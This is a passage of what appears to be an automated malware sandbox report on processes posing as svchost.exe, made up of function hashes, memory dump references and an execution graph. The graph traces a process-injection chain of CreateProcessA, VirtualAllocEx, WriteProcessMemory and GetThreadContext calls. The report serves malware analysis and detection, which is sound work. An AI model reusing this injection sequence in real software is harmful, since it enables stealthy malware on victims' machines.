                                • Instruction Fuzzy Hash: B1E09274E04208AFCB44EFA9E44559DBBF5AB48218F0185A9A909E7350EA746A448F81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05928D20, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab67a5dfd7230d0c89dfd7d7bf39540a8cb8388a3e8bf6beb59b6c0e99f1f199
                                • Instruction ID: 89e539735df869431e7222cb2f29cbf3314955c1cc7492a8f81f014a8f75fc47
                                • Opcode Fuzzy Hash: ab67a5dfd7230d0c89dfd7d7bf39540a8cb8388a3e8bf6beb59b6c0e99f1f199
                                • Instruction Fuzzy Hash: A1D0C9327511244F8708EBADE454C6973EEAF8D66531140FAE50ACB371DE65EC41CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920B68, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98532493363e31c368083adb66561c2066f562a4aa93b0d1be965a1f33da60ad
                                • Instruction ID: c7817bd4c3dd9e443cd00205bc079248bfd7f6b677d61c6c9fcb66f916b78bdf
                                • Opcode Fuzzy Hash: 98532493363e31c368083adb66561c2066f562a4aa93b0d1be965a1f33da60ad
                                • Instruction Fuzzy Hash: C8D05E70A0510DEF8B80EFA8EA014ADF7F9EF45214B2084ACD80CD7354EA316F099B81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920530, Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 403f199c1c739b0f4da0f4f55b6866fc934a533b3646d8cff5e36cb37421fadb
                                • Instruction ID: 80fa7952096d2cafb816b8ba651600e6e85bf3b8357e79a8b18707b673d75c4a
                                • Opcode Fuzzy Hash: 403f199c1c739b0f4da0f4f55b6866fc934a533b3646d8cff5e36cb37421fadb
                                • Instruction Fuzzy Hash: C5D05E342401448F87549B69E04482633AAEB8C6247109099ED098B3A5CE31EC418E51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059204F8, Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ede2dac6b7ec9e734b6bc31f361794dd467946c2dda85d2adcd0bc6a4dc292fc
                                • Instruction ID: 6ac4bdafd716daed8047b64eac5fdedeb33da0a93e85652f621238152322536a
                                • Opcode Fuzzy Hash: ede2dac6b7ec9e734b6bc31f361794dd467946c2dda85d2adcd0bc6a4dc292fc
                                • Instruction Fuzzy Hash: 3BC08C31AC832A4BEF067274F80A3DCF3889B50639F404136A819C3382EF6CD00B4680
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592DA08, Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 054339d86bcc8ddc7055ed3ffa8979d43d3b4db315d076aad8baedf3b895226e
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 054339d86bcc8ddc7055ed3ffa8979d43d3b4db315d076aad8baedf3b895226e
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592E518, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57fef67ff2943802b369e9407cc717f03d88eaa5c334d7d0bab2ae4c2922c9ea
                                • Instruction ID: 254fb5f018106ca216b5439a5903964575e109b84c4b78c4bda23d50d690922e
                                • Opcode Fuzzy Hash: 57fef67ff2943802b369e9407cc717f03d88eaa5c334d7d0bab2ae4c2922c9ea
                                • Instruction Fuzzy Hash: 8BB0123000570D8F8680BBE2F406D543B1CD54071DB844950E10C490329E646985C6C9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592F140, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ed556ac7be174996c2a828a2a520ec1a12cc5b27998a8b4d497d6f0e975a945
                                • Instruction ID: 4fface8932d0a11305c731303e16b337fab1e18bbf0dd073371e91c83f90f967
                                • Opcode Fuzzy Hash: 3ed556ac7be174996c2a828a2a520ec1a12cc5b27998a8b4d497d6f0e975a945
                                • Instruction Fuzzy Hash: CEB0123104560D5B8640ABE2F60655C3B1C954461CB908550E30C894165F683D1486CC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: svchost.exe PID: 6712 Parent PID: 3424 svchost.exeCOMMON

                                Execution Graph

                                Execution Coverage:11.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:361
                                Total number of Limit Nodes:18

                                Graph

                                execution_graph 27716 8780a58 27718 8780a80 27716->27718 27720 8780140 27718->27720 27721 878014b 27720->27721 27722 87810e6 27721->27722 27724 8780140 6 API calls 27721->27724 27729 87812c0 27721->27729 27723 8780a95 27722->27723 27735 878142d 27722->27735 27740 8781470 27722->27740 27744 8781460 27722->27744 27724->27722 27730 87812c4 27729->27730 27731 8781305 27730->27731 27732 878142d 6 API calls 27730->27732 27733 8781470 6 API calls 27730->27733 27734 8781460 6 API calls 27730->27734 27731->27722 27732->27731 27733->27731 27734->27731 27736 878144d 27735->27736 27737 878149f 27735->27737 27736->27723 27738 87814b6 27737->27738 27748 8780dc4 27737->27748 27738->27723 27742 8781474 27740->27742 27741 87814b6 27741->27723 27742->27741 27743 8780dc4 6 API calls 27742->27743 27743->27741 27745 8781464 27744->27745 27746 8781418 27745->27746 27747 8780dc4 6 API calls 27745->27747 27746->27723 27747->27746 27749 8780dcf 27748->27749 27751 8781528 27749->27751 27752 8780df8 27749->27752 27751->27751 27753 8780e03 27752->27753 27759 8780e08 27753->27759 27755 8781597 27763 87865e0 27755->27763 27772 87865f8 27755->27772 27756 87815d0 27756->27751 27760 8780e13 27759->27760 27761 8781cc2 27760->27761 27762 87812c0 6 API calls 27760->27762 27761->27755 27762->27761 27764 87865ec 27763->27764 27766 8786635 27764->27766 27782 8786860 27764->27782 27786 8786850 27764->27786 27765 8786675 27790 8787b3f 27765->27790 27805 8787b50 27765->27805 27820 8787b09 27765->27820 27766->27756 27774 8786629 27772->27774 27775 878671a 27772->27775 27773 8786635 27773->27756 27774->27773 27780 8786860 4 API calls 27774->27780 27781 8786850 4 API calls 27774->27781 27775->27756 27776 8786675 27777 8787b09 3 API calls 27776->27777 27778 8787b3f 3 API calls 27776->27778 27779 8787b50 3 API calls 27776->27779 27777->27775 27778->27775 27779->27775 27780->27776 27781->27776 27836 87868b0 27782->27836 27846 87868a1 27782->27846 27783 878686a 27783->27765 27787 878686a 27786->27787 27788 87868b0 3 API calls 27786->27788 27789 87868a1 3 API calls 27786->27789 27787->27765 27788->27787 27789->27787 27791 8787b44 27790->27791 27875 878586c 27791->27875 27794 8787bf8 27795 878579c GetModuleHandleW 27794->27795 27797 8787c21 27794->27797 27796 8787c4b 27795->27796 27890 8788224 27796->27890 27895 8788cce 27796->27895 27899 8788d08 27796->27899 27902 8788cc8 27796->27902 27798 878586c GetModuleHandleW 27798->27794 27806 8787b54 27805->27806 27807 878586c GetModuleHandleW 27806->27807 27808 8787bdc 27807->27808 27813 878586c GetModuleHandleW 27808->27813 27814 8788030 GetModuleHandleW 27808->27814 27815 8787fb0 GetModuleHandleW 27808->27815 27809 8787bf8 27810 878579c GetModuleHandleW 27809->27810 27812 8787c21 27809->27812 27811 8787c4b 27810->27811 27816 8788cc8 2 API calls 27811->27816 27817 8788d08 CreateWindowExW 27811->27817 27818 8788cce CreateWindowExW 27811->27818 27819 8788224 CreateWindowExW 27811->27819 27813->27809 27814->27809 27815->27809 27816->27812 27817->27812 27818->27812 27819->27812 27821 8787b12 27820->27821 27822 8787b0c 27820->27822 27821->27766 27822->27821 27823 878586c GetModuleHandleW 27822->27823 27824 8787bdc 27823->27824 27829 878586c GetModuleHandleW 27824->27829 27830 8788030 GetModuleHandleW 27824->27830 27831 8787fb0 GetModuleHandleW 27824->27831 27825 8787bf8 27826 878579c GetModuleHandleW 27825->27826 27828 8787c21 27825->27828 27827 8787c4b 27826->27827 27832 8788cc8 2 API calls 27827->27832 27833 8788d08 CreateWindowExW 27827->27833 27834 8788cce CreateWindowExW 27827->27834 27835 8788224 CreateWindowExW 27827->27835 27829->27825 27830->27825 27831->27825 27832->27828 27833->27828 27834->27828 27835->27828 27837 87868b4 27836->27837 27856 878579c 27837->27856 27840 87868d3 27841 87868db 27840->27841 27842 8786ad8 GetModuleHandleW 27840->27842 27841->27783 27843 8786b05 27842->27843 27843->27783 27847 87868a4 27846->27847 27848 878579c GetModuleHandleW 27847->27848 27849 87868c3 27848->27849 27850 87868db 27849->27850 27854 8786b38 2 API calls 27849->27854 27855 8786b29 2 API calls 27849->27855 27850->27783 27851 87868d3 27851->27850 27852 8786ad8 GetModuleHandleW 27851->27852 27853 8786b05 27852->27853 27853->27783 27854->27851 27855->27851 27857 8786a90 GetModuleHandleW 27856->27857 27859 87868c3 27857->27859 27859->27841 27860 8786b38 27859->27860 27865 8786b29 27859->27865 27861 878579c GetModuleHandleW 27860->27861 27862 8786b4c 27861->27862 27864 8786b71 27862->27864 27871 87857e0 27862->27871 27864->27840 27866 8786b2c 27865->27866 27867 878579c GetModuleHandleW 27866->27867 27868 8786b4c 27867->27868 27869 8786b71 27868->27869 27870 87857e0 LoadLibraryExW 27868->27870 27869->27840 27870->27869 27872 8786cf8 LoadLibraryExW 27871->27872 27874 8786d71 27872->27874 27874->27864 27876 8785877 27875->27876 27877 8787bdc 27876->27877 27910 87885d8 27876->27910 27920 87885c8 27876->27920 27877->27798 27880 8788030 27877->27880 27885 8787fb0 27877->27885 27881 8788004 27880->27881 27882 878810e 27881->27882 27883 87885d8 GetModuleHandleW 27881->27883 27884 87885c8 GetModuleHandleW 27881->27884 27883->27882 27884->27882 27886 8787fb4 27885->27886 27887 8787fcb 27886->27887 27888 87885d8 GetModuleHandleW 27886->27888 27889 87885c8 GetModuleHandleW 27886->27889 27887->27794 27888->27887 27889->27887 27891 8788d58 27890->27891 27892 8788e1b CreateWindowExW 27891->27892 27893 8788ceb 27891->27893 27894 8788e7c 27892->27894 27893->27797 27894->27894 27896 8788ce4 27895->27896 27897 8788224 CreateWindowExW 27896->27897 27898 8788d3d 27897->27898 27898->27797 27900 8788224 CreateWindowExW 27899->27900 27901 8788d3d 27900->27901 27901->27797 27903 8788ccc 27902->27903 27904 8788ce2 27903->27904 27905 8788d61 CreateWindowExW 27903->27905 27906 8788224 CreateWindowExW 27904->27906 27909 8788e7c 27905->27909 27907 8788d3d 27906->27907 27907->27797 27911 87885ed 27910->27911 27912 878579c GetModuleHandleW 27911->27912 27913 8788611 27911->27913 27912->27913 27914 878579c GetModuleHandleW 27913->27914 27919 87887cd 27913->27919 27915 8788753 27914->27915 27916 878579c GetModuleHandleW 27915->27916 27915->27919 27917 87887a1 27916->27917 27918 878579c GetModuleHandleW 27917->27918 27917->27919 27918->27919 27919->27877 27921 87885ed 27920->27921 27922 878579c GetModuleHandleW 27921->27922 27924 8788611 27921->27924 27922->27924 27923 87887cd 27923->27877 27924->27923 27925 878579c GetModuleHandleW 27924->27925 27926 8788753 27925->27926 27926->27923 27927 878579c GetModuleHandleW 27926->27927 27928 87887a1 27927->27928 27928->27923 27929 878579c GetModuleHandleW 27928->27929 27929->27923 28007 8780448 28010 878009c 28007->28010 28011 87804b0 DuplicateHandle 28010->28011 28012 8780476 28011->28012 27930 1b5d110 27931 1b5d128 27930->27931 27932 1b5d182 27931->27932 27938 8788f10 27931->27938 27944 878823c 27931->27944 27948 878824c 27931->27948 27957 8789be9 27931->27957 27966 8788f01 27931->27966 27943 8788f14 27938->27943 27939 878823c GetModuleHandleW 27940 8788f42 27939->27940 27941 878824c CallWindowProcW 27940->27941 27942 8788f57 27941->27942 27942->27932 27943->27939 27945 8788247 27944->27945 27972 8788274 27945->27972 27947 8789047 27947->27932 27951 8788257 27948->27951 27949 8789c59 27994 8788374 27949->27994 27951->27949 27952 8789c49 27951->27952 27978 8789e4c 27952->27978 27984 8789d70 27952->27984 27989 8789d80 27952->27989 27953 8789c57 27958 8789c57 27957->27958 27960 8789bf2 27957->27960 27959 8789c59 27961 8788374 CallWindowProcW 27959->27961 27960->27959 27962 8789c49 27960->27962 27961->27958 27963 8789e4c CallWindowProcW 27962->27963 27964 8789d70 CallWindowProcW 27962->27964 27965 8789d80 CallWindowProcW 27962->27965 27963->27958 27964->27958 27965->27958 27967 8788f04 27966->27967 27968 878823c GetModuleHandleW 27967->27968 27969 8788f42 27968->27969 27970 878824c CallWindowProcW 27969->27970 27971 8788f57 27970->27971 27971->27932 27973 878827f 27972->27973 27974 878586c GetModuleHandleW 27973->27974 27975 87890a9 27974->27975 27976 878579c GetModuleHandleW 27975->27976 27977 87890db 27975->27977 27976->27977 27979 8789e0a 27978->27979 27980 8789e5a 27978->27980 27998 8789e38 27979->27998 28001 8789e29 27979->28001 27981 8789e20 27981->27953 27986 8789d94 27984->27986 27985 8789e20 27985->27953 27987 8789e38 CallWindowProcW 27986->27987 27988 8789e29 CallWindowProcW 27986->27988 27987->27985 27988->27985 27990 8789d94 27989->27990 27992 8789e38 CallWindowProcW 27990->27992 27993 8789e29 CallWindowProcW 27990->27993 27991 8789e20 27991->27953 27992->27991 27993->27991 27995 878837f 27994->27995 27996 878b39a CallWindowProcW 27995->27996 27997 878b349 27995->27997 27996->27997 27997->27953 27999 8789e49 27998->27999 28004 878b2e0 27998->28004 27999->27981 28002 8789e49 28001->28002 28003 878b2e0 CallWindowProcW 28001->28003 28002->27981 28003->28002 28005 8788374 CallWindowProcW 28004->28005 28006 878b2ea 28005->28006 28006->27999 28013 878eac1 28015 878eade 28013->28015 28016 878f219 28013->28016 28020 878f258 28016->28020 28024 878f250 28016->28024 28017 878f244 28017->28015 28021 878f25c VirtualProtect 28020->28021 28023 878f2da 28021->28023 28023->28017 28025 878f254 VirtualProtect 28024->28025 28027 878f2da 28025->28027 28027->28017 28028 57a0640 28029 57a0644 28028->28029 28030 57a0660 28029->28030 28033 57a0787 28029->28033 28039 57a76b3 28029->28039 28034 57a0792 28033->28034 28035 57a083e 28034->28035 28043 57a26b8 28034->28043 28048 57a2740 28034->28048 28054 57a2750 28034->28054 28035->28030 28042 57a76bc 28039->28042 28040 57a7873 28040->28030 28042->28030 28042->28040 28164 57a2ff4 28042->28164 28044 57a26bc 28043->28044 28044->28034 28045 57a26ef 28044->28045 28059 57a2790 28044->28059 28063 57a2780 28044->28063 28045->28034 28049 57a2744 28048->28049 28051 57a27b5 28049->28051 28052 57a2790 8 API calls 28049->28052 28053 57a2780 8 API calls 28049->28053 28050 57a2775 28050->28034 28051->28034 28052->28050 28053->28050 28055 57a2754 28054->28055 28057 57a2790 8 API calls 28055->28057 28058 57a2780 8 API calls 28055->28058 28056 57a2775 28056->28034 28057->28056 28058->28056 28060 57a2794 28059->28060 28067 57a28d0 28060->28067 28061 57a27b1 28061->28045 28064 57a2784 28063->28064 28066 57a28d0 8 API calls 28064->28066 28065 57a27b1 28065->28045 28066->28065 28068 57a28d4 28067->28068 28069 57a2905 28068->28069 28081 57a4545 28068->28081 28086 57a4562 28068->28086 28090 57a3c2c 28068->28090 28095 57a31ef 28068->28095 28100 57a3128 28068->28100 28105 57a4cca 28068->28105 28109 57a47b5 28068->28109 28114 57a46f7 28068->28114 28118 57a30f0 28068->28118 28123 57a317c 28068->28123 28128 57a3ffa 28068->28128 28069->28061 28082 57a454a 28081->28082 28083 57a45d7 28082->28083 28132 57a6de9 28082->28132 28136 57a6df0 28082->28136 28088 57a6de9 VirtualAllocEx 28086->28088 28089 57a6df0 VirtualAllocEx 28086->28089 28087 57a45d7 28088->28087 28089->28087 28091 57a3c6a 28090->28091 28140 57a6c48 28091->28140 28144 57a6c40 28091->28144 28092 57a3c9e 28092->28069 28096 57a3154 28095->28096 28097 57a3ef1 28096->28097 28148 57a6708 28096->28148 28152 57a66fc 28096->28152 28097->28069 28101 57a3154 28100->28101 28102 57a3ef1 28101->28102 28103 57a6708 CreateProcessA 28101->28103 28104 57a66fc CreateProcessA 28101->28104 28102->28069 28103->28102 28104->28102 28156 57a6a89 28105->28156 28160 57a6a90 28105->28160 28106 57a4ce5 28110 57a47c1 28109->28110 28112 57a6c48 WriteProcessMemory 28110->28112 28113 57a6c40 WriteProcessMemory 28110->28113 28111 57a482a 28112->28111 28113->28111 28116 57a6c48 WriteProcessMemory 28114->28116 28117 57a6c40 WriteProcessMemory 28114->28117 28115 57a471e 28116->28115 28117->28115 28119 57a30f4 28118->28119 28120 57a3ef1 28119->28120 28121 57a6708 CreateProcessA 28119->28121 28122 57a66fc CreateProcessA 28119->28122 28120->28069 28121->28120 28122->28120 28124 57a3154 28123->28124 28124->28123 28125 57a3ef1 28124->28125 28126 57a6708 CreateProcessA 28124->28126 28127 57a66fc CreateProcessA 28124->28127 28125->28069 28126->28125 28127->28125 28130 57a6a89 GetThreadContext 28128->28130 28131 57a6a90 GetThreadContext 28128->28131 28129 57a4011 28130->28129 28131->28129 28133 57a6e30 VirtualAllocEx 28132->28133 28135 57a6e6d 28133->28135 28135->28083 28137 57a6e30 VirtualAllocEx 28136->28137 28139 57a6e6d 28137->28139 28139->28083 28141 57a6c90 WriteProcessMemory 28140->28141 28143 57a6ce7 28141->28143 28143->28092 28145 57a6c90 WriteProcessMemory 28144->28145 28147 57a6ce7 28145->28147 28147->28092 28149 57a6791 28148->28149 28149->28149 28150 57a68f6 CreateProcessA 28149->28150 28151 57a6953 28150->28151 28153 57a6791 28152->28153 28153->28153 28154 57a68f6 CreateProcessA 28153->28154 28155 57a6953 28154->28155 28157 57a6ad5 GetThreadContext 28156->28157 28159 57a6b1d 28157->28159 28159->28106 28161 57a6ad5 GetThreadContext 28160->28161 28163 57a6b1d 28161->28163 28163->28106 28165 57a7968 PostMessageW 28164->28165 28166 57a79d4 28165->28166 28166->28042

                                Executed Functions

                                Function 057A66FC, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 57a66fc-57a679d 2 57a679f-57a67a9 0->2 3 57a67d6-57a67f6 0->3 2->3 4 57a67ab-57a67ad 2->4 10 57a67f8-57a6802 3->10 11 57a682f-57a685e 3->11 5 57a67af-57a67b9 4->5 6 57a67d0-57a67d3 4->6 8 57a67bb 5->8 9 57a67bd-57a67cc 5->9 6->3 8->9 9->9 12 57a67ce 9->12 10->11 13 57a6804-57a6806 10->13 17 57a6860-57a686a 11->17 18 57a6897-57a6951 CreateProcessA 11->18 12->6 15 57a6808-57a6812 13->15 16 57a6829-57a682c 13->16 19 57a6816-57a6825 15->19 20 57a6814 15->20 16->11 17->18 21 57a686c-57a686e 17->21 31 57a695a-57a69e0 18->31 32 57a6953-57a6959 18->32 19->19 22 57a6827 19->22 20->19 23 57a6870-57a687a 21->23 24 57a6891-57a6894 21->24 22->16 26 57a687e-57a688d 23->26 27 57a687c 23->27 24->18 26->26 28 57a688f 26->28 27->26 28->24 42 57a69e2-57a69e6 31->42 43 57a69f0-57a69f4 31->43 32->31 42->43 44 57a69e8 42->44 45 57a69f6-57a69fa 43->45 46 57a6a04-57a6a08 43->46 44->43 45->46 47 57a69fc 45->47 48 57a6a0a-57a6a0e 46->48 49 57a6a18-57a6a1c 46->49 47->46 48->49 52 57a6a10 48->52 50 57a6a2e-57a6a35 49->50 51 57a6a1e-57a6a24 49->51 53 57a6a4c 50->53 54 57a6a37-57a6a46 50->54 51->50 52->49 56 57a6a4d 53->56 54->53 56->56
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057A693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: Ea`$Ea`
                                • API String ID: 963392458-3464468828
                                • Opcode ID: 5c91b3dcc5dc11742eb009fc8f8ad7b5bab44e7ce063d3e8bf32361317692bd2
                                • Instruction ID: df4cc923568cd2b5b3ed4a71e42ec44da5580934ce77f53710cdf9905c1faa20
                                • Opcode Fuzzy Hash: 5c91b3dcc5dc11742eb009fc8f8ad7b5bab44e7ce063d3e8bf32361317692bd2
                                • Instruction Fuzzy Hash: C7A18072D04219CFDF10CF68C845BEEBBB2BF88304F188669E819A7240DB759985DF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6708, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 57 57a6708-57a679d 59 57a679f-57a67a9 57->59 60 57a67d6-57a67f6 57->60 59->60 61 57a67ab-57a67ad 59->61 67 57a67f8-57a6802 60->67 68 57a682f-57a685e 60->68 62 57a67af-57a67b9 61->62 63 57a67d0-57a67d3 61->63 65 57a67bb 62->65 66 57a67bd-57a67cc 62->66 63->60 65->66 66->66 69 57a67ce 66->69 67->68 70 57a6804-57a6806 67->70 74 57a6860-57a686a 68->74 75 57a6897-57a6951 CreateProcessA 68->75 69->63 72 57a6808-57a6812 70->72 73 57a6829-57a682c 70->73 76 57a6816-57a6825 72->76 77 57a6814 72->77 73->68 74->75 78 57a686c-57a686e 74->78 88 57a695a-57a69e0 75->88 89 57a6953-57a6959 75->89 76->76 79 57a6827 76->79 77->76 80 57a6870-57a687a 78->80 81 57a6891-57a6894 78->81 79->73 83 57a687e-57a688d 80->83 84 57a687c 80->84 81->75 83->83 85 57a688f 83->85 84->83 85->81 99 57a69e2-57a69e6 88->99 100 57a69f0-57a69f4 88->100 89->88 99->100 101 57a69e8 99->101 102 57a69f6-57a69fa 100->102 103 57a6a04-57a6a08 100->103 101->100 102->103 104 57a69fc 102->104 105 57a6a0a-57a6a0e 103->105 106 57a6a18-57a6a1c 103->106 104->103 105->106 109 57a6a10 105->109 107 57a6a2e-57a6a35 106->107 108 57a6a1e-57a6a24 106->108 110 57a6a4c 107->110 111 57a6a37-57a6a46 107->111 108->107 109->106 113 57a6a4d 110->113 111->110 113->113
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057A693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: Ea`$Ea`
                                • API String ID: 963392458-3464468828
                                • Opcode ID: 1f6662bb0a102892c9305603e38475fdca9fd2fd3703baee604d800a843726db
                                • Instruction ID: 3c4bca0485a6e9bfa930850614028fea995e700e6ab712308ed2b7d1ea9466bf
                                • Opcode Fuzzy Hash: 1f6662bb0a102892c9305603e38475fdca9fd2fd3703baee604d800a843726db
                                • Instruction Fuzzy Hash: 12918E72D04219CFDF10CF68C845BEEBBB6BF88314F188669E819A7240DB749985DF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08788CC8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 114 8788cc8-8788cca 115 8788ccc 114->115 116 8788cd4-8788ce0 114->116 115->116 117 8788d42-8788d4e 116->117 118 8788ce2 116->118 121 8788d58-8788d5b 117->121 122 8788d50-8788d52 117->122 119 8788cec-8788cef 118->119 120 8788ce4-8788cea 118->120 124 8788cf4-8788cfa 119->124 120->124 127 8788ceb 120->127 125 8788d5c-8788d5e 121->125 122->125 126 8788d54-8788d56 122->126 128 8788cfc-8788d03 124->128 129 8788d04-8788d38 call 8788224 124->129 130 8788d60 125->130 126->121 126->130 127->119 128->129 138 8788d3d-8788d3e 129->138 130->127 131 8788d61-8788dbe 130->131 133 8788dc9-8788dd0 131->133 134 8788dc0-8788dc6 131->134 136 8788ddb-8788e7a CreateWindowExW 133->136 137 8788dd2-8788dd8 133->137 134->133 140 8788e7c-8788e82 136->140 141 8788e83-8788ebb 136->141 137->136 140->141 145 8788ec8 141->145 146 8788ebd-8788ec0 141->146 147 8788ec9 145->147 146->145 147->147
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ea`$Ea`
                                • API String ID: 0-3464468828
                                • Opcode ID: 2661694b402974f2ea0575855022ed0abd9cd9d8d12ce4f06cef843e2daa0139
                                • Instruction ID: da309ee4500c75b771e1d1d6048da18ce4db3901d322153a15fa97cee7cdc33e
                                • Opcode Fuzzy Hash: 2661694b402974f2ea0575855022ed0abd9cd9d8d12ce4f06cef843e2daa0139
                                • Instruction Fuzzy Hash: A87144B1844388EFCB12DFA9C840ADDBFB1BF49310F5581AAE804AB226C7719855DF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08788224, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 148 8788224-8788d60 152 8788ceb-8788cfa 148->152 153 8788d61-8788dbe 148->153 160 8788cfc-8788d03 152->160 161 8788d04-8788d38 call 8788224 152->161 154 8788dc9-8788dd0 153->154 155 8788dc0-8788dc6 153->155 157 8788ddb-8788e7a CreateWindowExW 154->157 158 8788dd2-8788dd8 154->158 155->154 164 8788e7c-8788e82 157->164 165 8788e83-8788ebb 157->165 158->157 160->161 167 8788d3d-8788d3e 161->167 164->165 171 8788ec8 165->171 172 8788ebd-8788ec0 165->172 173 8788ec9 171->173 172->171 173->173
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08788E6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID: Ea`$Ea`
                                • API String ID: 716092398-3464468828
                                • Opcode ID: 7a9bb6ebd219768f8220c02abc0da8225d0d903596379e411d591db6cdb5a119
                                • Instruction ID: 26d8d403536c5bac35b01f41cb8509c2dd009c20e768cc18ae14aab6dafb2378
                                • Opcode Fuzzy Hash: 7a9bb6ebd219768f8220c02abc0da8225d0d903596379e411d591db6cdb5a119
                                • Instruction Fuzzy Hash: FF51C0B1D00309DFDB14DF99C884ADEBBB5BF48314F64822AE819AB214D7759885CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 087868B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
